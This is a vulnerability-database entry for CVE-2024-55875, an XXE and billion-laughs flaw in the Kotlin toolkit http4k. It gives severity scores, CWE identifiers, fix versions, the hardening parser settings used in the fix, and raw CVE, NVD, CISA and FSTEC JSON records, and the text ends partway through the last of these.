Vulnerability-Lookup

CVE-2024-55875 (GCVE-0-2024-55875)

Vulnerability from cvelistv5 – Published: 2024-12-12 18:56 – Updated: 2026-06-09 10:42

Title

http4k has a potential XXE (XML External Entity Injection) vulnerability

Summary

http4k is a functional toolkit for Kotlin HTTP applications. Prior to version 6.50.0.0, there is a potential XXE (XML External Entity Injection) vulnerability when http4k handling malicious XML contents within requests, which might allow attackers to read local sensitive information on server, trigger Server-side Request Forgery and even execute code under some circumstances. The original fix shipped in v5.41.0.0 / v4.50.0.0 closed the documented external-entity attack class (SSRF, local-file disclosure, code execution) by setting `ACCESS_EXTERNAL_DTD=""`, `ACCESS_EXTERNAL_SCHEMA=""`, and `isExpandEntityReferences=false` on the default `DocumentBuilderFactory`. A residual gap remained: the parser still accepted documents containing `<!DOCTYPE>` declarations even though external entity resolution was blocked. This left open billion-laughs-style internal entity expansion DoS attacks against any application using `Body.xml()` or `Document.asXmlDocument()` on untrusted XML. v6.50.0.0 closes this residual by adding `disallow-doctype-decl=true` and `FEATURE_SECURE_PROCESSING=true` to `defaultXmlParsingConfig`. Any document containing a `<!DOCTYPE>` is now rejected at parse time.

Severity

9.8 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

SSVC

Exploitation: poc Automatable: yes Technical Impact: total

CISA Coordinator (v2.0.3)

CWE

CWE-200 - Exposure of Sensitive Information to an Unauthorized Actor
CWE-611 - Improper Restriction of XML External Entity Reference
CWE-918 - Server-Side Request Forgery (SSRF)

Assigner

GitHub_M

References

3 references

URL	Tags
https://github.com/http4k/http4k/security/advisor…	x_refsource_CONFIRM
https://github.com/http4k/http4k/commit/35297adc6…	x_refsource_MISC
https://github.com/http4k/http4k/blob/25696dff2d9…	x_refsource_MISC

Impacted products

1 product

Vendor	Product	Version
http4k	http4k	Affected: < 6.50.0.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-55875",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-12-13T14:52:57.520637Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-12-13T14:55:49.763Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/http4k/http4k/security/advisories/GHSA-7mj5-hjjj-8rgw"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "http4k",
          "vendor": "http4k",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 6.50.0.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "http4k is a functional toolkit for Kotlin HTTP applications. Prior to version 6.50.0.0, there is a potential XXE (XML External Entity Injection) vulnerability when http4k handling malicious XML contents within requests, which might allow attackers to read local sensitive information on server, trigger Server-side Request Forgery and even execute code under some circumstances. The original fix shipped in v5.41.0.0 / v4.50.0.0 closed the documented external-entity attack class (SSRF, local-file disclosure, code execution) by setting `ACCESS_EXTERNAL_DTD=\"\"`, `ACCESS_EXTERNAL_SCHEMA=\"\"`, and `isExpandEntityReferences=false` on the default `DocumentBuilderFactory`. A residual gap remained: the parser still accepted documents containing `\u003c!DOCTYPE\u003e` declarations even though external entity resolution was blocked. This left open billion-laughs-style internal entity expansion DoS attacks against any application using `Body.xml()` or `Document.asXmlDocument()` on untrusted XML. v6.50.0.0 closes this residual by adding `disallow-doctype-decl=true` and `FEATURE_SECURE_PROCESSING=true` to `defaultXmlParsingConfig`. Any document containing a `\u003c!DOCTYPE\u003e` is now rejected at parse time."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-200",
              "description": "CWE-200: Exposure of Sensitive Information to an Unauthorized Actor",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-611",
              "description": "CWE-611: Improper Restriction of XML External Entity Reference",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-918",
              "description": "CWE-918: Server-Side Request Forgery (SSRF)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-06-09T10:42:10.658Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/http4k/http4k/security/advisories/GHSA-7mj5-hjjj-8rgw",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/http4k/http4k/security/advisories/GHSA-7mj5-hjjj-8rgw"
        },
        {
          "name": "https://github.com/http4k/http4k/commit/35297adc6d6aca4951d50d8cdf17ff87a8b19fbc",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/http4k/http4k/commit/35297adc6d6aca4951d50d8cdf17ff87a8b19fbc"
        },
        {
          "name": "https://github.com/http4k/http4k/blob/25696dff2d90206cc1da42f42a1a8dbcdbcdf18c/core/format/xml/src/main/kotlin/org/http4k/format/Xml.kt#L42-L46",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/http4k/http4k/blob/25696dff2d90206cc1da42f42a1a8dbcdbcdf18c/core/format/xml/src/main/kotlin/org/http4k/format/Xml.kt#L42-L46"
        }
      ],
      "source": {
        "advisory": "GHSA-7mj5-hjjj-8rgw",
        "discovery": "UNKNOWN"
      },
      "title": "http4k has a potential XXE (XML External Entity Injection) vulnerability"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2024-55875",
    "datePublished": "2024-12-12T18:56:59.499Z",
    "dateReserved": "2024-12-11T15:46:36.420Z",
    "dateUpdated": "2026-06-09T10:42:10.658Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2024-55875",
      "date": "2026-06-10",
      "epss": "0.08049",
      "percentile": "0.92304"
    },
    "fkie_nvd": {
      "descriptions": "[{\"lang\": \"en\", \"value\": \"http4k is a functional toolkit for Kotlin HTTP applications. Prior to version 5.41.0.0, there is a potential XXE (XML External Entity Injection) vulnerability when http4k handling malicious XML contents within requests, which might allow attackers to read local sensitive information on server, trigger Server-side Request Forgery and even execute code under some circumstances. Version 5.41.0.0 contains a patch for the issue.\"}, {\"lang\": \"es\", \"value\": \"http4k es un conjunto de herramientas funcionales para aplicaciones HTTP de Kotlin. Antes de la versi\\u00f3n 5.41.0.0, exist\\u00eda una posible vulnerabilidad XXE (inyecci\\u00f3n de entidad externa XML) cuando http4k gestionaba contenido XML malicioso dentro de las solicitudes, lo que podr\\u00eda permitir a los atacantes leer informaci\\u00f3n confidencial local en el servidor, activar Server-side Request Forgery e incluso ejecutar c\\u00f3digo en algunas circunstancias. La versi\\u00f3n 5.41.0.0 contiene un parche para el problema.\"}]",
      "id": "CVE-2024-55875",
      "lastModified": "2024-12-13T15:15:42.860",
      "metrics": "{\"cvssMetricV31\": [{\"source\": \"security-advisories@github.com\", \"type\": \"Secondary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\", \"baseScore\": 9.8, \"baseSeverity\": \"CRITICAL\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"NONE\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"HIGH\", \"availabilityImpact\": \"HIGH\"}, \"exploitabilityScore\": 3.9, \"impactScore\": 5.9}]}",
      "published": "2024-12-12T19:15:13.983",
      "references": "[{\"url\": \"https://github.com/http4k/http4k/blob/25696dff2d90206cc1da42f42a1a8dbcdbcdf18c/core/format/xml/src/main/kotlin/org/http4k/format/Xml.kt#L42-L46\", \"source\": \"security-advisories@github.com\"}, {\"url\": \"https://github.com/http4k/http4k/commit/35297adc6d6aca4951d50d8cdf17ff87a8b19fbc\", \"source\": \"security-advisories@github.com\"}, {\"url\": \"https://github.com/http4k/http4k/security/advisories/GHSA-7mj5-hjjj-8rgw\", \"source\": \"security-advisories@github.com\"}, {\"url\": \"https://github.com/http4k/http4k/security/advisories/GHSA-7mj5-hjjj-8rgw\", \"source\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\"}]",
      "sourceIdentifier": "security-advisories@github.com",
      "vulnStatus": "Awaiting Analysis",
      "weaknesses": "[{\"source\": \"security-advisories@github.com\", \"type\": \"Secondary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-200\"}, {\"lang\": \"en\", \"value\": \"CWE-611\"}, {\"lang\": \"en\", \"value\": \"CWE-918\"}]}]"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2024-55875\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2024-12-12T19:15:13.983\",\"lastModified\":\"2026-06-09T11:16:46.530\",\"vulnStatus\":\"Deferred\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"http4k is a functional toolkit for Kotlin HTTP applications. Prior to version 6.50.0.0, there is a potential XXE (XML External Entity Injection) vulnerability when http4k handling malicious XML contents within requests, which might allow attackers to read local sensitive information on server, trigger Server-side Request Forgery and even execute code under some circumstances. The original fix shipped in v5.41.0.0 / v4.50.0.0 closed the documented external-entity attack class (SSRF, local-file disclosure, code execution) by setting `ACCESS_EXTERNAL_DTD=\\\"\\\"`, `ACCESS_EXTERNAL_SCHEMA=\\\"\\\"`, and `isExpandEntityReferences=false` on the default `DocumentBuilderFactory`. A residual gap remained: the parser still accepted documents containing `\u003c!DOCTYPE\u003e` declarations even though external entity resolution was blocked. This left open billion-laughs-style internal entity expansion DoS attacks against any application using `Body.xml()` or `Document.asXmlDocument()` on untrusted XML. v6.50.0.0 closes this residual by adding `disallow-doctype-decl=true` and `FEATURE_SECURE_PROCESSING=true` to `defaultXmlParsingConfig`. Any document containing a `\u003c!DOCTYPE\u003e` is now rejected at parse time.\"},{\"lang\":\"es\",\"value\":\"http4k es un conjunto de herramientas funcionales para aplicaciones HTTP de Kotlin. Antes de la versi\u00f3n 5.41.0.0, exist\u00eda una posible vulnerabilidad XXE (inyecci\u00f3n de entidad externa XML) cuando http4k gestionaba contenido XML malicioso dentro de las solicitudes, lo que podr\u00eda permitir a los atacantes leer informaci\u00f3n confidencial local en el servidor, activar Server-side Request Forgery e incluso ejecutar c\u00f3digo en algunas circunstancias. La versi\u00f3n 5.41.0.0 contiene un parche para el problema.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":9.8,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-200\"},{\"lang\":\"en\",\"value\":\"CWE-611\"},{\"lang\":\"en\",\"value\":\"CWE-918\"}]}],\"references\":[{\"url\":\"https://github.com/http4k/http4k/blob/25696dff2d90206cc1da42f42a1a8dbcdbcdf18c/core/format/xml/src/main/kotlin/org/http4k/format/Xml.kt#L42-L46\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/http4k/http4k/commit/35297adc6d6aca4951d50d8cdf17ff87a8b19fbc\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/http4k/http4k/security/advisories/GHSA-7mj5-hjjj-8rgw\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/http4k/http4k/security/advisories/GHSA-7mj5-hjjj-8rgw\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2024-55875\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2024-12-13T14:52:57.520637Z\"}}}], \"references\": [{\"url\": \"https://github.com/http4k/http4k/security/advisories/GHSA-7mj5-hjjj-8rgw\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2024-12-13T14:53:02.044Z\"}}], \"cna\": {\"title\": \"http4k has a potential XXE (XML External Entity Injection) vulnerability\", \"source\": {\"advisory\": \"GHSA-7mj5-hjjj-8rgw\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 9.8, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"CRITICAL\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"http4k\", \"product\": \"http4k\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 6.50.0.0\"}]}], \"references\": [{\"url\": \"https://github.com/http4k/http4k/security/advisories/GHSA-7mj5-hjjj-8rgw\", \"name\": \"https://github.com/http4k/http4k/security/advisories/GHSA-7mj5-hjjj-8rgw\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/http4k/http4k/commit/35297adc6d6aca4951d50d8cdf17ff87a8b19fbc\", \"name\": \"https://github.com/http4k/http4k/commit/35297adc6d6aca4951d50d8cdf17ff87a8b19fbc\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/http4k/http4k/blob/25696dff2d90206cc1da42f42a1a8dbcdbcdf18c/core/format/xml/src/main/kotlin/org/http4k/format/Xml.kt#L42-L46\", \"name\": \"https://github.com/http4k/http4k/blob/25696dff2d90206cc1da42f42a1a8dbcdbcdf18c/core/format/xml/src/main/kotlin/org/http4k/format/Xml.kt#L42-L46\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"http4k is a functional toolkit for Kotlin HTTP applications. Prior to version 6.50.0.0, there is a potential XXE (XML External Entity Injection) vulnerability when http4k handling malicious XML contents within requests, which might allow attackers to read local sensitive information on server, trigger Server-side Request Forgery and even execute code under some circumstances. The original fix shipped in v5.41.0.0 / v4.50.0.0 closed the documented external-entity attack class (SSRF, local-file disclosure, code execution) by setting `ACCESS_EXTERNAL_DTD=\\\"\\\"`, `ACCESS_EXTERNAL_SCHEMA=\\\"\\\"`, and `isExpandEntityReferences=false` on the default `DocumentBuilderFactory`. A residual gap remained: the parser still accepted documents containing `\u003c!DOCTYPE\u003e` declarations even though external entity resolution was blocked. This left open billion-laughs-style internal entity expansion DoS attacks against any application using `Body.xml()` or `Document.asXmlDocument()` on untrusted XML. v6.50.0.0 closes this residual by adding `disallow-doctype-decl=true` and `FEATURE_SECURE_PROCESSING=true` to `defaultXmlParsingConfig`. Any document containing a `\u003c!DOCTYPE\u003e` is now rejected at parse time.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-200\", \"description\": \"CWE-200: Exposure of Sensitive Information to an Unauthorized Actor\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-611\", \"description\": \"CWE-611: Improper Restriction of XML External Entity Reference\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-918\", \"description\": \"CWE-918: Server-Side Request Forgery (SSRF)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-06-09T10:42:10.658Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2024-55875\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-06-09T10:42:10.658Z\", \"dateReserved\": \"2024-12-11T15:46:36.420Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2024-12-12T18:56:59.499Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

BDU:2025-00486

Vulnerability from fstec - Published: 11.12.2024

Title

Уязвимость функционального набора инструментов для приложений Kotlin HTTP http4k, связанная с неверным ограничением XML-ссылок на внешние объекты, позволяющая нарушителю проводить XXE-атаки

Description

Уязвимость функционального набора инструментов для приложений Kotlin HTTP http4k связана с неверным ограничением XML-ссылок на внешние объекты. Эксплуатация уязвимости может позволить нарушителю, действующему удаленно, проводить XXE-атаки

Severity


                    
                      AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Vendor

Сообщество свободного программного обеспечения

Software Name

http4k

Software Version

до 5.41.0.0 (http4k), до 4.50.0.0 (http4k)

Possible Mitigations

Использование рекомендаций: https://github.com/http4k/http4k/security/advisories/GHSA-7mj5-hjjj-8rgw

Reference

https://github.com/http4k/http4k/security/advisories/GHSA-7mj5-hjjj-8rgw https://github.com/http4k/http4k/blob/25696dff2d90206cc1da42f42a1a8dbcdbcdf18c/core/format/xml/src/main/kotlin/org/http4k/format/Xml.kt#L42-L46 https://github.com/http4k/http4k/commit/35297adc6d6aca4951d50d8cdf17ff87a8b19fbc

CWE

CWE-611

JSON

To clipboard

{
  "CVSS 2.0": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
  "CVSS 3.0": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  "CVSS 4.0": null,
  "remediation_\u0418\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440": null,
  "remediation_\u041d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435": null,
  "\u0412\u0435\u043d\u0434\u043e\u0440 \u041f\u041e": "\u0421\u043e\u043e\u0431\u0449\u0435\u0441\u0442\u0432\u043e \u0441\u0432\u043e\u0431\u043e\u0434\u043d\u043e\u0433\u043e \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f",
  "\u0412\u0435\u0440\u0441\u0438\u044f \u041f\u041e": "\u0434\u043e 5.41.0.0 (http4k), \u0434\u043e 4.50.0.0 (http4k)",
  "\u0412\u043e\u0437\u043c\u043e\u0436\u043d\u044b\u0435 \u043c\u0435\u0440\u044b \u043f\u043e \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044e": "\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0439:\nhttps://github.com/http4k/http4k/security/advisories/GHSA-7mj5-hjjj-8rgw",
  "\u0414\u0430\u0442\u0430 \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0438\u044f": "11.12.2024",
  "\u0414\u0430\u0442\u0430 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0433\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f": "20.01.2025",
  "\u0414\u0430\u0442\u0430 \u043f\u0443\u0431\u043b\u0438\u043a\u0430\u0446\u0438\u0438": "20.01.2025",
  "\u0418\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440": "BDU:2025-00486",
  "\u0418\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440\u044b \u0434\u0440\u0443\u0433\u0438\u0445 \u0441\u0438\u0441\u0442\u0435\u043c \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "CVE-2024-55875",
  "\u0418\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u043e\u0431 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0430",
  "\u041a\u043b\u0430\u0441\u0441 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043a\u043e\u0434\u0430",
  "\u041d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 \u041f\u041e": "http4k",
  "\u041d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435 \u041e\u0421 \u0438 \u0442\u0438\u043f \u0430\u043f\u043f\u0430\u0440\u0430\u0442\u043d\u043e\u0439 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u044b": null,
  "\u041d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0444\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u043d\u0430\u0431\u043e\u0440\u0430 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432 \u0434\u043b\u044f \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0439 Kotlin HTTP http4k, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u0430\u044f \u0441 \u043d\u0435\u0432\u0435\u0440\u043d\u044b\u043c \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u0435\u043c XML-\u0441\u0441\u044b\u043b\u043e\u043a \u043d\u0430 \u0432\u043d\u0435\u0448\u043d\u0438\u0435 \u043e\u0431\u044a\u0435\u043a\u0442\u044b, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u043d\u0430\u0440\u0443\u0448\u0438\u0442\u0435\u043b\u044e \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u0442\u044c XXE-\u0430\u0442\u0430\u043a\u0438",
  "\u041d\u0430\u043b\u0438\u0447\u0438\u0435 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430": "\u0414\u0430\u043d\u043d\u044b\u0435 \u0443\u0442\u043e\u0447\u043d\u044f\u044e\u0442\u0441\u044f",
  "\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u043e\u0448\u0438\u0431\u043a\u0438 CWE": "\u041d\u0435\u0432\u0435\u0440\u043d\u043e\u0435 \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u0435 XML-\u0441\u0441\u044b\u043b\u043e\u043a \u043d\u0430 \u0432\u043d\u0435\u0448\u043d\u0438\u0435 \u043e\u0431\u044a\u0435\u043a\u0442\u044b (CWE-611)",
  "\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0444\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u043d\u0430\u0431\u043e\u0440\u0430 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432 \u0434\u043b\u044f \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0439 Kotlin HTTP http4k \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u043d\u0435\u0432\u0435\u0440\u043d\u044b\u043c \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u0435\u043c XML-\u0441\u0441\u044b\u043b\u043e\u043a \u043d\u0430 \u0432\u043d\u0435\u0448\u043d\u0438\u0435 \u043e\u0431\u044a\u0435\u043a\u0442\u044b. \u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442\u044c \u043d\u0430\u0440\u0443\u0448\u0438\u0442\u0435\u043b\u044e, \u0434\u0435\u0439\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u043c\u0443 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e, \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u0442\u044c XXE-\u0430\u0442\u0430\u043a\u0438",
  "\u041f\u043e\u0441\u043b\u0435\u0434\u0441\u0442\u0432\u0438\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": null,
  "\u041f\u0440\u043e\u0447\u0430\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f": null,
  "\u0421\u0432\u044f\u0437\u044c \u0441 \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u0430\u043c\u0438 \u0418\u0411": "\u0414\u0430\u043d\u043d\u044b\u0435 \u0443\u0442\u043e\u0447\u043d\u044f\u044e\u0442\u0441\u044f",
  "\u0421\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u041e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u0430",
  "\u0421\u043f\u043e\u0441\u043e\u0431 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f": "\u041e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f",
  "\u0421\u043f\u043e\u0441\u043e\u0431 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438": "\u0418\u043d\u044a\u0435\u043a\u0446\u0438\u044f",
  "\u0421\u0441\u044b\u043b\u043a\u0438 \u043d\u0430 \u0438\u0441\u0442\u043e\u0447\u043d\u0438\u043a\u0438": "https://github.com/http4k/http4k/security/advisories/GHSA-7mj5-hjjj-8rgw\nhttps://github.com/http4k/http4k/blob/25696dff2d90206cc1da42f42a1a8dbcdbcdf18c/core/format/xml/src/main/kotlin/org/http4k/format/Xml.kt#L42-L46\t\nhttps://github.com/http4k/http4k/commit/35297adc6d6aca4951d50d8cdf17ff87a8b19fbc",
  "\u0421\u0442\u0430\u0442\u0443\u0441 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u041f\u043e\u0434\u0442\u0432\u0435\u0440\u0436\u0434\u0435\u043d\u0430 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0438\u0442\u0435\u043b\u0435\u043c",
  "\u0422\u0438\u043f \u041f\u041e": "\u041f\u0440\u0438\u043a\u043b\u0430\u0434\u043d\u043e\u0435 \u041f\u041e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c",
  "\u0422\u0438\u043f \u043e\u0448\u0438\u0431\u043a\u0438 CWE": "CWE-611",
